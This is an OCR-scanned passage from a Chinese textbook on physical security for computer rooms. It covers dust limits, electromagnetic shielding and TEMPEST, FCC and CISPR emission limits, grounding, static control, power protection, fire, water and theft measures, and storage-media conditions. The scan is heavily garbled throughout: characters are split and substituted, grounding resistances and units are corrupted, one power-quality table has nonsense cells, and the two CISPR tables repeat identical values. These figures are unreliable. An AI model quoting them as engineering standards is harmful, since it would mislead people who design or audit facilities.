如 果 人 尘埃 落 入 计算 机 设备 ,容易 引起 接触 不 良 ,发 热 元 件 的 散热 效率 降低 .造成 性 能 下 
降 , 其 至 造成 击 穿 ; 灰尘 还 会 增加 机 械 磨损 ,尤其 对 驱动 器 和 盘 片 。 
机 房 尘 埃 的 主要 来 源 有 : 机 房 工 作 人 员 出 入 机房 时 由 缝隙 侵入 ; 空调 系统 及 补充 的 新 
风 ; 机 房 的 墙壁 天 棚 、 地 板 等 脱落 物 形 成 的 灰尘 等 。 
一 般 来 说 ,要 求 机 房 尘 埃 颗粒 直径 不 小 于 0. 5pm 的 尘埃 个 数 应 该 不 大 于 18 000 粒 /cmm 。 
具体 情况 见 表 11. 4。 
表 11.4 机 房 内 尘埃 要 求 
项 目 A 级 B 级 C 级 
粒度 (pm) 之 0.5 之 0.5 之 0.5 
个 数 ( 粒 /L) 350 1000 18000 


计算 机 房 必须 有 除尘 、 防 尘 的 设备 和 措施 ,保持 清洁 卫生 ,以 保证 设备 的 正常 工作 。 除 
尘埃 应 从 消除 其 产生 源 人 手 , 具 体 办 法 有 : 

(1) 进入 机 房 的 人 员 应 换 上 专用 的 工作 服 和 工作 鞋 ,或 戴 上 鞋 套 。 

(2) 机 房 室 内 的 门 、 窗 应 为 双 层 密封 式 ,保持 空气 正 压 值 ,防止 外 界 污染 空气 侵入 ,同时 
补充 新 风 来 维持 正 压 所 增加 的 风量 。 

(3) 在 空调 系统 中 安装 空气 过 滤器 ,收集 进入 机 房 和 回 风 中 的 尘埃 ,及 时 清理 风 网 , 防 
止 空气 污染 。 

(4) 建筑 装饰 材料 尽量 选择 不 吸 尘 、 不 起 尘 的 材料 ,地 面 不 能 涂 附着 力 强 的 漆 , 最 好 铺 
水 磨 石和 瓷砖 或 安装 活动 地 板 ,保持 表面 光洁 ,不 起 灰尘 。 

(5) 做 好 表面 清洁 除 污 上 作 。 在 关机 状态 下 ,可 以 用 干净 柔软 并 且 微 湿 的 抹布 擦拭 设 
备 , 对 于 难以 清除 的 污渍 可 以 使 用 中 性 清洁 剂 或 计算 机 专用 清洁 剂 加 以 去 除 , 然 后 用 抹布 擦 
净 晾 干 。 

(6) 精密 设备 使 用 专用 的 除尘 器 来 进行 除尘 。 


11.1.4 机 房 的 电磁 干扰 防护 


在 一 个 系统 内 ,两 个 或 两 个 以 上 电子 元 器 件 处 于 同一 环境 时 ,就 会 产生 电磁 干扰 。 电 磁 
干扰 是 电子 设备 或 通信 设备 中 最 主要 的 干扰 。 计 算 机 网 络 系 统 处 在 复杂 的 电磁 干扰 的 环境 
中 ,这 种 电磁 干扰 有 时 很 强 , 会 引起 计算 机 设备 的 信号 突变 ,造成 设备 不 能 正常 工作 ,因此 对 
机 房 进行 电磁 干扰 防护 是 非常 必要 的 。 

电磁 防护 的 主要 目的 是 提高 计算 机 及 网 络 系 统 、 其 他 电子 设备 的 抗 干扰 能 力 ,使 之 能 抵 
抗 强 电 磁 干 扰 ; 同时 将 计算 机 的 电磁 泄漏 发 射 降 到 最 低 ,防止 电磁 泄漏 。 

1. 电磁 干扰 的 分 类 

按 干 扰 的 耦合 方式 不 同 ,可 将 电磁 干扰 分 为 传导 干扰 和 辐射 干扰 两 类 。 

(1) 传导 干扰 是 通过 干扰 源 和 被 干扰 电路 之 间 存 在 的 一 个 公共 阻抗 而 产生 的 干扰 。 例 
如 ,两 台 设备 采用 共用 电源 供电 ,或 者 两 条 平行 导线 相距 很 近 时 ,都 可 能 产生 传导 干扰 。 

(2) 辐射 干扰 是 通过 介质 以 电磁 场 的 形式 传播 的 干扰 。 辆 射电 磁场 从 辐射 源 通过 天 线 
效应 向 空间 辐射 电磁 波 ,按照 波 的 规律 向 空间 传播 ,被 干扰 电路 经 耦合 将 干扰 引入 到 电路 中 
来 。 辐 射 干扰 源 可 以 是 载 流 导 线 , 如 信号 线 . 电 源 线 等 ,也 可 为 芯片 电路 等 。 

传导 干扰 和 辐射 干扰 主要 取决 于 干扰 源 的 频率 。 低 频 时 ,干扰 往往 属于 传导 耦合 ; 高 
频 时 ,干扰 往往 属于 电磁 辐射 。 通常 ,起 传导 作用 的 电源 线 和 地 线 等 同时 具有 传导 干扰 和 辐 
射 干 扰 的 影响 。 

2. 影响 计算 机 电磁 辐射 强度 的 因素 

(1) 功率 和 频率 : 设备 的 功率 越 大 ,辐射 强度 越 大 ; 信号 频率 越 高 ,辐射 强度 越 大 。 

(2) 距离 : 在 同等 条 件 下 ,辐射 轻 度 与 距离 成 反比 。 离 辐射 源 越 近 , 辆 射 强度 越 大 , 离 
辐射 源 越 远 ,辐射 强度 越 小 。 

(3) 屏蔽 状况 : 辐射 源 已 经 屏蔽 且 辐 射 情况 良好 ,辐射 强度 就 会 相应 减 小 。 

3. 电磁 干扰 防护 措施 

一 般 说 来 ,主机 房 内 无 线 电 干 扰 场 强 不 应 大 于 126dB; 磁场 干扰 场 强 不 应 大 于 800A/m。 
当 机 房 的 电磁 场 干 扰 强 度 超 过 要 求 时 ,应 采取 措施 。 
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对 传导 发 射 的 防护 ,主要 采取 对 电源 线 和 信号 线 加 装 性 能 良好 的 滤波 器 , 减 小 传输 阻抗 
和 导线 间 的 交叉 耦合 。 

对 辐射 的 防护 ,这 类 防护 措施 又 可 分 为 两 种 : 一 种 是 采用 各 种 电磁 屏蔽 措施 ,如 对 设备 
的 金属 屏蔽 和 各 种 接 插 件 的 屏蔽 ,同时 对 机 房 的 下 水 管 、 瞬 气管 和 金属 门窗 进行 屏蔽 和 隔 
离 ; 第 二 种 是 干扰 的 防护 措施 , 即 在 计算 机 系统 工作 的 同时 ,利用 干扰 装置 产生 一 种 与 计算 
机 系统 辐射 相关 的 伪 噪 声 向 空间 辐射 来 掩盖 计算 机 系统 的 工作 频率 和 信息 特征 。 

电磁 干扰 防护 的 主要 措施 有 : 

(1) 选用 低 辐射 设备 。 

防止 电磁 干扰 的 根本 措施 。 低 辐射 设备 在 设计 生产 时 已 对 能 产生 电磁 干扰 的 电子 元 
件 、 集 成 电路 .连接 线 和 阴极 射线 管 等 采取 了 防 辐射 措施 ,把 设备 的 辐射 程度 抑制 到 最 低 。 

(2) 采取 屏蔽 措施 。 

屏蔽 是 应 用 最 多 的 方法 。 屏 蔽 可 以 有 效 地 抑制 电磁 信息 向 外 泄漏 ,衰减 外 界 强 电磁 干 
扰 ,保护 内 部 的 设备 、 器 件 或 电路 ,使 其 能 在 恶劣 的 电磁 环境 下 正常 工作 。 屏 项 体 一 般 是 用 
导电 和 导 磁 性 能 较 好 的 金属 板 制 成 。 

屏蔽 可 以 分 为 以 下 3 种 类 型 : 电 屏 蔽 、 磁 屏蔽 和 电磁 屏蔽 。 

@ 电 屏 蔽 : 电 屏 蔽 是 将 电子 元 器 件 或 设备 用 金属 屏蔽 层 包 封 起 来 ,避免 它们 之 间 通 过 
耦合 引起 干扰 而 采取 的 措施 。 

@ 磁 屏 项 : 磁 屏 项 是 采用 导 磁 性 好 的 材料 包 封 起 被 屏蔽 物 ,为 屏蔽 体内 外 的 磁场 提供 
低 磁 阻 的 通路 来 分 流 磁场 ,避免 磁场 干扰 ,抑制 磁场 辐射 。 

@ 电磁 屏蔽 : 电磁 屏蔽 是 对 电磁 场 进 行 屏蔽 。 因 为 电场 和 磁场 一 般 不 孤立 存在 ,所 以 
这 也 是 主要 的 屏蔽 措施 。 平 时 所 说 屏蔽 ,一 般 指 电磁 屏蔽 。 

(3) 利用 噪声 干扰 源 。 

利用 噪声 干扰 源 有 以 下 两 种 方式 : 

J@D 使 用 白 品 声 干扰 源 。 可 以 采用 两 种 方法 : 一 种 方法 是 将 一 台 能 够 产生 白 噪 声 的 干 
扰 源 放 在 设备 方便 ,让 干扰 源 产 生 的 白 品 声 与 设备 产生 的 辐射 信息 混在 一 起 ; 另 一 种 方法 
是 将 处 理 重要 信息 的 设备 防止 在 中 间 ,四 周 放置 一 些 处理 一 般 信息 的 设备 ,让 这 些 设 备 产生 
的 辐射 信息 一 起 向 外 辐射 。 

@ 利用 干扰 器 。 干扰 器 会 产生 大 量 的 仿真 信息 处 理 设备 的 伪 随 机 干扰 信号 ,使 辐射 信 
号 和 干扰 信号 在 空间 和 加 成 一 种 复合 信号 向 外 辐射 ,破坏 了 原 辐 射 信号 的 形态 ,使 接收 者 无 
法 还 原 信息 。 

两 种 方式 比较 起 来 ,利用 干扰 器 的 效果 比 利 用 白 噪声 干扰 源 的 效果 好 ,但 干扰 器 的 辐射 
强度 大 ,很 容易 造成 环境 的 电磁 噪声 污染 。 

(4) 进行 距离 防护 。 

这 是 一 种 非常 经 济 的 方法 。 设 备 的 电磁 辐射 在 空间 传播 时 随 着 距离 的 增加 而 衰减 , 因 
此 在 机 房 位 置 的 选择 上 应 该 考虑 这 一 因素 ,使 机 房 有 较 大 防护 距离 。 

(5) 采用 微波 吸收 材料 。 

使 用 微波 吸收 材料 可 以 减少 电磁 辐射 .不 同 的 微波 吸收 材料 有 不 同 的 频率 范围 和 特性 ， 
在 实际 中 可 以 根据 情况 进行 选择 。 


4. 电磁 辐射 国际 标准 TEMPEST 

TEMPEST(Transient Electromagnetic Pulse Standard Technology) 是 抑制 信息 处 理 
设备 的 噪声 泄漏 技术 ,简称 信息 泄漏 防护 技术 。TEMPEST 技术 是 综合 性 很 强 的 技术 , 包 
括 泄漏 信息 的 分 析 、 预 测 .接收 识别、 复原 防护、 测试 安全 评估 等 项 技术 ,涉及 多 个 学 科 领 
域 。 它 关心 的 是 不 能 泄漏 有 用 的 信息 。 一 般 认 为 显示 器 的 视频 信号 .打印 机 打印 头 的 驱动 
信和 号、 磁头 读 / 写 信和 号、 键盘 输入 信和 号 以 及 信号 线 上 的 输入 /输出 信号 等 为 重点 防护 信和 号。 
TEMPEST 技术 是 由 政府 严格 控制 的 一 个 特殊 技术 领域 ,各 国 对 该 技术 领域 严格 保密 ,其 
核心 技术 内 容 的 密级 也 比较 高 。 

1) 国外 标准 

(1) 美国 FCC 标准 。 

1979 年 9 月 ,美国 联邦 通信 委员 会 (FCC) 为 了 减少 计算 机 设备 产生 的 电磁 干扰 ,发 布 
了 文件 号 为 FCC 20780 的 计算 机 设备 电磁 辐射 标准 。 

FCC 标准 吧 计算 机 设备 分 为 A 和 B 两 类 ,对 这 两 类 设备 有 不 同 的 电磁 辐射 要 求 ,B 类 
设备 的 电磁 辐射 要 求 要 比 A 类 设备 的 严格 。A 类 设备 用 于 商业 工业 或 企 事 业 环境 中 的 计 
算 机 设备 ,不 包括 用 于 公共 场所 和 家 庭 的 计算 机 设备 。B 类 设备 用 于 居住 环境 的 计算 机 设 
备 , 但 不 包括 计算 器 、 电 子 游戏 机 和 其 他 用 于 公共 场所 的 电子 设备 。 

FCC 标准 规定 了 A 类 设备 和 B 类 设备 电磁 泄漏 和 传导 泄漏 的 极限 值 ,如 表 11.5 和 
表 11.6 所 示 。 除 此 之 外 FCC 标准 还 对 测试 方法 ,测试 设备 和 调试 带宽 等 问题 进行 了 规定 。 


表 11.5 FCC 电磁 辐射 泄漏 极限 值 


频率 (MHz) A 类 (30m) A 类 (3m) B 类 (3m) 
30 一 88 30pVVm 300pV/m l00pV/m 
88~216 50pV/m 500pV/m 150pV/m 
216~1000 70uV/m 700pV/m 200pVym 


表 11.6 FCC 传导 泄漏 极限 值 


频率 (MHz) A 类 (1V) B 类 (nV) 
0.45~1.6 6000 250 
1.6~30 3000 250 


(2) CISPR 标准 。 

1984 年 7 月 ,国际 无 线 电 干扰 特别 委员 会 (CISPR) 发 布 了 信息 技术 设备 的 电磁 干扰 标 
准 和 测试 方法 ,推荐 给 世界 各 国 使 用 这 个 标准 。 

与 美国 的 FCC 标准 类 似 ,CISPR 也 把 信息 处 理 设备 分 为 A 和 B 两 类 ,对 于 这 两 类 设备 
有 不 同 的 辐射 要 求 。CISPR 标准 同样 规定 了 A 类 设备 和 B 类 设备 电磁 泄漏 和 传导 泄漏 的 
极限 值 ,如 表 11.7 和 表 11. 8 所 示 。CISPR 标准 的 测试 方法 与 FCC 标准 的 测试 方法 大 致 
相同 。 

2) 我 国 的 TEMPEST 标准 研究 

我 国 的 TEMPEST 标准 研究 开始 于 20 世纪 90 年 代 , 正 在 逐步 系列 化 、 完 善 化 ,目前 已 
有 的 标准 主要 有 : 
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表 11.7 CISPR 电磁 辐射 泄漏 极限 值 


设备 类 型 频率 范围 (MHz) 极限 值 (yV) 
0.15~0. 50 30 
A 
类 0.50~30 37 
0.15~6.0 30 
B 
6.0~30 27 


表 11.8 CISPR 传导 泄漏 极限 值 


11. 


设备 类 型 频率 范围 (MHz) 极限 值 (nV) 
0.15~0.50 30 
A 
类 0.50~30 37 
0.15~6.0 30 
B 
类 6.0~30 27 


(1) BMB2 一 1998《 使 用 现场 的 信息 设备 电路 泄漏 发 射 检查 测试 方法 和 安全 判 据 》( 绝 密 


(2) BMB3 一 1999%( 处 理 涉 密 信息 的 电磁 屏蔽 室 的 技术 要 求 和 测试 方法 》( 机 密级 ) 。 
(3) GGBB1 一 1999《 信 息 设 备 电磁 泄漏 发 射 限 值 )( 绝 密级 )。 

(4) GGBB2 一 1999《 信 息 设备 电磁 泄漏 发 射 测试 方法 》( 绝 密级 )。 

(5) BMB4 一 2000《 电 磁 干 扰 器 技术 要 求 和 测试 方法 (秘密 级 )。 

(6) BMB5 一 2000《 涉 密 信息 设备 使 用 现场 的 电磁 泄漏 发 射 防护 要 求 )( 秘 密级 )。 


1.5 机 房 接地 保护 与 静电 保护 


1. 接地 保护 
计算 机 系统 和 工作 场所 的 接地 是 非常 重要 的 安全 措施 。 接 地 是 指 系 统 中 各 处 电位 均 以 


大 地 为 参考 点 ,地 为 零 电位 。 接 地 可 以 为 计算 机 系统 的 数字 电路 提供 一 个 稳定 的 低 电 位 
(0V)。 机 房 内 必须 部 署 接地 装置 ,这 不 仅 是 为 了 网 络 系统 的 安全 ,同时 也 是 为 了 工作 人 员 
的 安全 。 


1) 地 线 种 类 

根据 GB/T2887 一 2000 标准 《电子 计算 机 场地 通用 规范 》, 机 房 接 地 有 4 种 方式 : 

(1) 交流 工作 接地 ,接地 电阻 不 应 大 于 45Q。 

(2) 安全 工作 接地 ,接地 电阻 不 应 大 于 450 。 

(3) 直流 工作 接地 ,接地 电阻 不 应 大 于 100 。 

(4) 防 雷 接地 ,应 按 现 行 国家 标准 (建筑 防 雷 设计 规范 ) 执 行 。 

根据 GB50174 一 934 电 子 计算 机 机 房 设计 规范 》, 接 地 时 应 考虑 如 下 原则 : 

(1) 交流 工作 阶地 、 安 全 保护 接地 、 直 流 工作 接地 和 防 雷 接地 等 4 种 接地 宜 共 用 一 组 接 


地 装置 ,其 接地 电阻 按 其 中 最 小 值 确 定 。 若 防 雷 接地 单独 设置 接地 装置 时 ,其 余 3 种 接地 宜 
共用 一 组 接地 装置 ,其 接地 电阻 不 应 大 于 其 中 的 最 小 值 , 并 应 按 现行 标准 《建筑 防 雷 设计 规 
范 ) 要 求 采取 防 雷 击 措施 。 


(2) 对 直流 工作 接地 有 特殊 要 求 , 需 单独 设置 接地 装置 的 电子 计算 机 系统 ,其 接地 电阻 


值 及 与 其 他 接地 装置 的 接地 体 之 间 的 距离 ,应 当 按 照 计算 机 系统 及 有 关 规 定 的 要 求 确定 。 

(3) 计算 机 系统 的 接地 应 采取 单 点 接地 并 宜 采 取 等 电位 措施 。 

(4) 当 多 个 计算 机 系统 共用 一 组 接地 装置 时 , 宜 将 各 计算 机 系统 分 别 采用 接地 线 与 接 
地 体 连接 。 

2) 接地 体 

通常 采用 的 接地 体 有 地 桩 ,水 平 栅 网 、 金 属 接 地 板 .建筑 物 基础 钢筋 等 。 

(1) 地 桩 : 垂直 打 入 地 下 的 接地 金属 棒 或 金属 管 , 是 常用 的 接地 体 。 它 用 在 土壤 层 超 
过 3m 厚 的 地 方 。 金 属 棒 的 材料 为 钢 或 铜 ,直径 一 般 应 为 15mm 以 上 。 为 防止 腐蚀 、 增 大 接 
触 面积 并 承受 打击 力 , 地 桩 通常 采用 较 粗 的 镀 锌 钢管 。 

(2) 水 平 机 网 : 在 土质 情况 较 差 , 特 别 是 岩层 接近 地 表面 无 法 打桩 的 情况 下 ,可 采用 水 
平 埋 设 金属 条 带 ,电缆 的 方法 。 金 属 条 带 应 埋 在 地 下 0. 5m 一 lm 深 处 ,水 平方 向 构成 星 形 
或 栅 格 网 形 ,在 每 个 交叉 处 ,条 带 应 焊接 在 一 起 , 且 带 间距 离 宇 1m。 

(3) 金属 接地 板 : 将 金属 板 与 地 面 垂直 埋 在 地 下 ,与 土壤 形成 至 少 0. 2m? 的 双 面 接触 。 
深度 要 求 在 永久 性 潮 土壤 以 下 30cm, 一 般 至 少 在 地 下 埋 1. 5m 深 。 金 属 板 的 材料 通常 为 铜 
板 , 也 可 分 为 铁 板 或 钢板 。 

(4) 建筑 物 基础 钢筋 : 现代 高 层 建 筑 的 基础 深入 地 下 几 十 米 , 基 础 钢筋 在 地 下 形成 很 
大 的 地 网 并 延伸 至 顶层 ,每 层 均 可 接地 线 。 这 种 接地 体 节 省 场地 ,经 济 适用 ,是 城市 建设 机 
房 地 线 的 发 展 方向 。 

2. 静电 保护 

接地 也 是 防 静 电 采 取 的 最 基本 措施 。 静 电 是 由 物体 间 的 相互 摩擦 .接触 而 产生 的 ,静电 
产生 后 ,由 于 它 不 能 汇 放 而 保留 在 物体 内 ,产生 很 高 的 电位 ,而 静电 放电 时 发 生火 花 , 计 算 机 
信息 系统 的 各 个 关键 电路 ,诸如 CPU、ROM、RAM 等 ,对 静电 极为 敏感 ,很 容易 被 静电 
击 穿 。 

1) 静电 产生 的 原因 

产生 静电 的 原因 很 多 , 随 着 机 房 内 各 种 绝缘 材料 和 化 学 合成 材料 的 使 用 ,静电 问题 越 来 
越 严重 。 首 先 , 部 分 机 房 内 铺设 的 地 悉 是 产生 静电 的 根源 ,其 最 易 产生 静电 积累 。 其 次 , 工 
作 人 员 穿 着 的 化 纤 类 衣物 ,也 是 静电 产生 的 原因 。 再 次 ,静电 的 产生 也 与 气候 有 关 , 比 如 冬 
季 气 候 干燥 ,气温 低 ,空气 能 累积 大 量 电荷 ,因此 静电 产生 与 释放 在 冬天 更 明显 。 无 论 怎样 ， 
静电 释放 在 一 定 程度 上 是 存在 着 ,同时 静电 产生 也 是 不 可 避免 的 。 

2) 静电 的 防范 措施 

静电 的 防范 措施 主要 有 : 

(1) 保证 计算 机 设备 的 外 壳 接 地 良好 ,一 些 电 路 板 不 使 用 时 应 包装 在 传导 泡沫 中 ,以 避 
免 静电 伤害 。 

(2) 在 机 房 建 设 中 装修 材料 避免 使 用 挂 毯 . 地 毯 等 易 产生 静电 的 材料 ,应 采用 乙烯 材 
料 。 机 房 内 应 该 采用 活动 地 板 , 活 动 地 板 表 面 应 是 导 静 电 的 。 

(3) 机 房 内 的 家 具 如 磁带 、 磁 盘 柜 、 工 作 台 表面 尽 可 能 用 金属 材料 ; 工作 台面 及 座 椅 材 
料 应 是 导 静 电 的 。 

(4) 维修 人 员 在 用 手 触摸 芯片 电路 之 前 ,应 先 把 体内 静电 放 掉 。 工 作 人 员 服 装 .鞋子 应 
该 使 用 防 静电 材料 或 低 阻 值 的 材料 。 


网 经 实体 滨 会 
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(5) 机 房 内 应 保持 一 定 湿度 ,在 北方 干燥 季节 应 适当 加 湿 , 以 免 因 干燥 而 产生 静电 。 
(6) 在 易 产 生 静 电 的 地 方 ,使 用 静电 消除 剂 或 静电 消除 器 。 


11.1.6 机 房 电源 系统 


电源 是 计算 机 网 络 系统 正常 工作 的 重要 因素 。 电 源 设备 应 提供 稳定 可 靠 的 电源 ,供电 
电源 设备 的 容量 应 具有 一 定 的 余 量 。 计 算 机 房 设备 最 好 是 采取 专线 供电 。 为 保证 设备 用 电 
质量 和 用 电 安 全 ,电源 应 至 少 有 两 路 供电 , 当 正 在 使 用 的 线路 供电 出 现 问 题 时 ,通过 自动 转 
换 开关 迅速 切换 到 备用 线路 供电 。 应 安装 备用 电源 ,如 长 时 间 不 间断 电源 (UPS) ,停电 后 可 
供电 8 小 时 或 更 长 时 间 。 关 键 的 设备 应 有 备用 发 电机 组 和 应 急电 源 。 同 时 为 防止 .限制 瞬 
态 过 压 和 引导 浪 涌 电流 ,应 配备 电 涌 保 护 器 (过 压 保 护 器 ) 。 从 电源 室 到 计算 机 电源 系统 的 
电缆 不 应 对 计算 机 系统 的 正常 运行 构成 干扰 。 

1. 电源 线 干 扰 

(1) 中 断 : 三 相 线 因 故障 而 停止 供电 为 中 断 ,长 时 间 中 断 即 为 关闭 。 

(2) 异常 中 断 : 是 指 电压 连续 过 载 或 连续 低 电 压 。 

(3) 电压 瞬 变 : 瞬 变 浪 涌 是 指 电压 幅 值 在 几 个 正弦 波 范 围 内 快速 增加 或 降低 。 

(4) 冲击 : 冲击 又 称 瞬 变 脉冲 或 尖峰 电压 , 它 是 指 在 0. 5ws 一 100mws 内 过 高 或 过 低 的 电 
压 。 尖 峰 一 般 指 瞬时 电压 超过 400V ,而 下 垂 电 压 指 瞬时 向 下 的 窄 脉冲 。 

(5) 噪声 : 电磁 干扰 是 由 电源 线 辐射 产生 的 电磁 噪声 干扰 ,射频 干扰 是 发 射频 率 之 
30kHz 时 的 电磁 干扰 。 

(6) 突然 失效 事件 : 指 由 雷击 等 引起 的 快速 升 起 的 电磁 脉冲 冲击 ,致使 设备 失效 。 

2. 供电 电源 质量 分 级 标准 

表 11.9 列 出 了 供电 电源 质量 分 级 标准 。 


表 11.9 供电 电源 质量 分 级 标准 


项 目 A 级 B 级 C 级 
稳 态 电压 偏 移 范围 (%) EE E5 雯 和 
稳 态 频 率 偏 移 范围 (Hz) 土 0.2 主 055 六 
电压 波形 畸变 率 (%) 3 一 5 5~8 8~10 
允许 断 电 持 续 时 间 (ms) 0 一 4 4 一 200 200 一 1500 
3. 电源 保护 装置 


(1) 金属 氧化 物 可 变 电 阻 (MOV) : 可 吸收 尖峰 和 冲击 电压 ,工作 时 间 lws 一 5ns。 

(2) 硅 雪 崩 二 极 管 (SAZD) 和 气体 放电 管 (GDT): 可 使 浪 涌 和 尖峰 电压 分 流 , 从 而 保护 
电路 。 硅 雪崩 二 极 管 的 工作 速度 快 (10-*s) ,但 不 能 处 理 大 的 浪 涌 ; 气体 放电 管 能 处 理 大 的 
浪 涌 ,但 工作 速度 较 慢 (只 能 达 10“s) 。 

(3) 滤波 器 : 使 噪声 分 流 并 使 浪 涌 衰 减 。 

(4) 电压 调整 变压器 (VRT): 可 在 秒 级 进行 异常 状态 保护 。 

(5) 不 间断 电源 (UPS) : 可 保护 系统 ,避免 断 电 、 下 跌 、 下 垂 , 电 源 故 障 、 供 电 不 足 和 其 
他 低 电压 状态 的 影响 。 


4. 紧急 情况 下 供电 

(1) UPS: 正常 供电 时 ,UPS 可 使 交流 电源 整流 并 不 间断 地 使 电池 充电 。 在 断 电 时 ,由 
电池 组 通过 逆 变 器 向 机 房 设备 提供 交流 电 。 从 而 有 效 地 保护 系统 及 数据 。 在 特别 重要 的 场 
合 ,应 考虑 采用 此 种 措施 。 

(2) 应 急电 源 : 主要 通过 汽油 机 或 柴油 机 带动 发 电机 ,在 断 电 时 启动 ,为 系统 提供 较 长 
时 间 的 紧急 供电 。 它 需要 有 自己 的 燃料 支持 。 应 急 发 电机 只 对 最 重要 的 设备 提供 支持 , 包 
括 空调 服务器. 照 明灯、 报警 系统 .通信 设备 等 。 

5. 电压 调节 变压器 和 紧急 开关 

电源 电压 波动 超过 设备 安全 操作 允许 的 范围 时 ,需要 进行 电压 调整 。 如 果 机 房 设备 直 
接 与 电网 连接 , 则 要 有 一 个 电压 调节 变压器 ,以 保持 电压 稳定 。 这 个 变压器 安装 在 机 房 附近 
时 ,需要 在 机 房 周围 设 置 防火 隔离 带 。 

计算 机 系统 的 电源 开关 ( 主 控 开 关 ) 应 安装 在 计算 机 主 控制 开关 柜 附 近 。 这 些 开 关 要 清 
楚 地 标注 出 它们 的 功能 。 操 作者 应 熟练 掌握 在 紧急 情况 下 如 何 操作 它们 。 


11.1.7 机房 的 防火 、 防 水 与 防盗 


由 于 机 房 大 量 使 用 电源 ,必须 对 机 房 采 取 防 火 和 防水 措施 。 机 房 的 火灾 一 般 是 由 于 电 
气 原因 、 人 为 事故 或 外 部 火灾 蔓延 引起 的 。 机 房 的 水 灾 一 般 是 由 于 机 房 内 有 渗水 漏水 原因 
引起 。 

1. 防火 采取 的 措施 

(1) 隔离 设施 : 建筑 内 的 计算 机 房 四 周 应 设计 一 个 隔离 带 ,以 使 外 部 的 火灾 至 少 可 隔 
离 一 个 小 时 。 

(2) 火灾 报警 系统 : 在 火灾 初期 就 能 检测 到 并 及 时 发 出 警报 。 火 灾 报 警 系 统 按 传感器 
的 不 同 , 分 为 烟 报警 和 温度 报警 两 种 类 型 。 为 安全 起 见 , 机 房 应 配备 多 种 火灾 自动 报警 系 
统 , 并 保证 在 断 电 后 24 小 时 之 内 仍然 能 够 发 出 警报 。 报 警 器 为 音响 或 灯光 报警 ,一 般 安放 
在 值班 室 或 人 员 集 中 处 ,以 便 工作 人 员 及 时 发 现 并 向 消防 部 门 报告 ,组 织 人 员 下 散 等 。 

(3) 灭火 设施 : 灭火 器 、 灭 火 工 具 及 辅助 设备 (如 液压 千斤 项 、 手 提 式 锯 、 铁 镍 、 匀 、 枪 
头 、 应 急 灯 等 )。 

(4) 管理 措施 : 机 房 应 有 应 急 计划 及 相关 制度 ,要 严格 执行 计算 机 房 环境 和 设备 维护 
的 各 项 规章 制度 ,加 强 对 火灾 隐患 部 位 的 检查 。 如 电源 线路 要 经 常 检查 是 否 有 短路 处 ,防止 
出 现 火花 引起 火灾 。 要 制定 灭火 的 应 急 计 划 并 对 所 属 人 员 进 行 培训 。 

2. 防水 采取 的 措施 

(1) 机 房 应 尽量 选择 避 开 顶部 存在 水 源 的 房间 ,位 于 用 水 设备 下 层 的 计算 机 机 房 , 应 在 
吊顶 上 设防 水 层 , 并 定期 检查 是 否 有 漏水 的 迹象 。 

(2) 为 每 台 设备 准备 一 个 防水 音 ,在 无 人 看 管 或 漏水 时 盖 住 每 台 设 备 。 

(3) 机 房 地 面 高 出 外 界 8 一 10cm, 防 止 同 层 房间 跑 水 歌 及 机 房 。 

(4) 地 板 下 铺设 的 各 种 线路 应 放置 在 线 槽 中 ,地面 设置 排水 沟 道 。 

(5) 在 漏水 隐患 处 设置 漏水 检测 报警 系统 。 

3. 防盗 采取 的 措施 

对 重要 的 设备 和 存储 媒体 应 采取 严格 的 防盗 措施 。 除 了 设置 坚固 的 防盗 门窗 防盗 的 基 
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本 设施 以 外 ,还 要 对 计算 机 网 络 系统 的 外 围 环境 、 操 作 环境 进行 实时 的 全 程 监控 ,报警 和 控 
制 。 可 采取 的 防盗 监控 系统 有 : 

(1) 视频 监视 系统 一 一 能 对 系统 运行 的 外 围 环境 、 操 作 环境 实施 监控 ( 视 ) 。 

(2) 入 侵 报警 系统 一 一 一 旦 有 盗贼 强行 闻 和 人 机房 ,入 侵 报警 系统 可 以 立即 报警 。 

(3) 出 入口 控 制 系统 一 一 值班 守卫 ,出 人口 安 装 金属 防护 装置 保护 安全 门 窗户。 

(4) 类 似 于 图 书馆 超级 市 场 使 用 的 保护 系统 一 一 每 台 重要 的 设备 、 每 个 重要 存储 媒体 和 
硬件 贴 上 特殊 标签 (如 磁性 标签 ) ,一 旦 被 盗 或 未 被 授权 携带 外 出 ,检测 器 就 会 发 出 报警 信号 。 


11.2 计算 机 网 络 机 房 存 储 介质 防护 


硬件 防护 一 般 是 指 在 计算 机 硬件 (CPU 、 存 储 器 .外 设 等 ) 上 采取 措施 或 通过 增加 硬件 
来 防护 。 如 计算 机 加 锁 、 专 门 的 信息 保护 卡 (如 防 病 毒 卡 、 防 拷贝 卡 ) ,插座 式 的 数据 变换 硬 
件 ( 如 安装 在 并 行 口上 的 加 密 狗 等 ) 以 及 用 界限 寄存 器 对 内 存单 元 进行 保护 等 措施 。 

由 于 硬件 安全 防护 措施 的 开支 大 , 且 不 易 随 着 设备 的 更 新 换代 而 改变 ,因此 ,许多 安全 
保护 功能 是 由 软件 实现 的 。 软 件 保护 措施 灵活 , 易 实 现 、 易 改变 ,但 它 占用 资源 多 、 开 销 大 ， 
并 且 运 行 起 来 会 降低 计算 机 的 性 能 ,有 时 还 需要 操作 系统 支持 。 

存储 介质 上 存储 了 大 量 的 信息 ,因此 ,机 房 安全 中 的 一 项 重要 内 容 是 存储 介质 的 防护 。 
对 存储 介质 实体 上 的 防护 主要 是 防盗 , 防 毁 、 防 霉 等 。 对 于 重要 的 系统 ,需要 将 硬件 防护 同 
系统 软件 的 支持 相 结 合 , 以 确保 安全 。 


11.2.1 存储 介质 防护 


1. 存储 介质 存放 的 环境 要 求 
存放 存储 介质 的 办 公 室 应 设立 专人 值班 ,检查 开关 门 情况 ,及 时 查看 机 密 材 料 是 否 放 人 
安全 箱 或 文件 柜 内 ,办 公 室 门窗 是 否 关 好 。 存 放 存 储 介质 的 保护 设备 应 具有 防火 、 防 水 、 防 
震 和 防 电磁 场 的 性 能 ,保护 设备 的 密码 应 该 定期 重新 设置 ,并 且 密 码 的 选择 要 符合 安全 原 
则 。 存 放 存储 介质 与 计算 机 的 正常 工作 条 件 类 似 ,包括 温度 、 湿 度 、 洁 净 度 和 磁场 强度 等 要 
求 , 详 细 情 况 见 表 11. 10。 
表 11.10 存储 介质 的 温度 ,湿度 和 磁场 强度 要 求 


项 目 纸 质 介质 光盘 i 磁盘 
已 记录 数据 的 | 未 记录 数据 的 
温度 CC) 6 一 35 6 一 35 <32 5~50 4~50 
相对 湿度 (%) 40~70 20~80 20~80 8~80 
磁场 强度 (A/m) 一 =3200 <4200 =4000 


2. 存储 介质 的 分 类 与 防护 

